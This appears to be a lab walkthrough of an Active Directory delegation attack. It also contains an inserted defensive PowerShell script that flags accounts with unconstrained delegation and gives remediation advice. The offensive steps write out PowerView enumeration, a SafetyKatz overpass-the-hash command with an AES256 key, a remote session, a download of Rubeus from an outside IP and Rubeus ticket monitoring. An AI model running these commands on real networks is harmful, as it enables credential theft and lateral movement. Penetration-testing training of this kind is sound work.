Let’s load PowerView:

. .\PowerView.ps1

Now let’s check for computers that have unconstrained delegation configured:

Get-DomainComputer -Unconstrained | select samaccountname

Notice that the US-WEB$ server is listed.
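
The search above matches computer accounts whose userAccountControl attribute has the TRUSTED_FOR_DELEGATION bit (0x80000) set, which is the same property a defender audits. The following is an added example, not part of the original walkthrough: the function name and sample rows are constructed, and the commented query assumes the RSAT ActiveDirectory module is available.

```powershell
# Added example: flag accounts trusted for unconstrained delegation.
# userAccountControl bits (documented by Microsoft):
$TRUSTED_FOR_DELEGATION = 0x80000   # 524288, unconstrained delegation
$SERVER_TRUST_ACCOUNT   = 0x2000    # 8192, domain controller account

function Find-UnconstrainedDelegation {   # hypothetical helper name
    param(
        [Parameter(ValueFromPipeline = $true)]
        [psobject]$Account
    )
    process {
        $uac = [int]$Account.userAccountControl
        # Skip accounts that do not carry the delegation bit at all.
        if (($uac -band $TRUSTED_FOR_DELEGATION) -eq 0) { return }
        $isDc = ($uac -band $SERVER_TRUST_ACCOUNT) -ne 0
        [pscustomobject]@{
            SamAccountName     = $Account.SamAccountName
            UserAccountControl = '0x{0:X}' -f $uac
            IsDomainController = $isDc
            # DCs carry this flag by design; any other host is a finding to review.
            Finding            = if ($isDc) { 'Expected (DC)' } else { 'Review: unconstrained delegation' }
        }
    }
}

# Constructed sample rows (not real directory data) so the example runs offline.
$sample = @(
    [pscustomobject]@{ SamAccountName = 'DC01$';  userAccountControl = 532480 }  # 0x82000
    [pscustomobject]@{ SamAccountName = 'APP01$'; userAccountControl = 528384 }  # 0x81000
    [pscustomobject]@{ SamAccountName = 'WKS01$'; userAccountControl = 4096 }    # 0x1000
)
$sample | Find-UnconstrainedDelegation | Format-Table -AutoSize

# Against a live domain (assumes the RSAT ActiveDirectory module is installed):
# Get-ADComputer -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)' `
#     -Properties userAccountControl | Find-UnconstrainedDelegation
```

Non-DC hosts that this flags are candidates for constrained delegation instead, and privileged accounts can be marked "Account is sensitive and cannot be delegated" or added to Protected Users.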

Now let’s overpass-the-hash as the webmaster user:

.\SafetyKatz.exe "sekurlsa::pth /user:webmaster /domain:us.techcorp.local /aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0 /ptt"

In the new CMD window, let’s open PowerShell and start a PowerShell Remoting session to the us-web server:

Enter-PSSession -ComputerName us-web

Now let’s transfer Rubeus to the us-web server:

wget -Uri http://192.168.100.36/Rubeus.exe -OutFile Rubeus.exe

Now let’s run Rubeus in monitor mode:

.\Rubeus.exe monitor /interval:5 /nowrap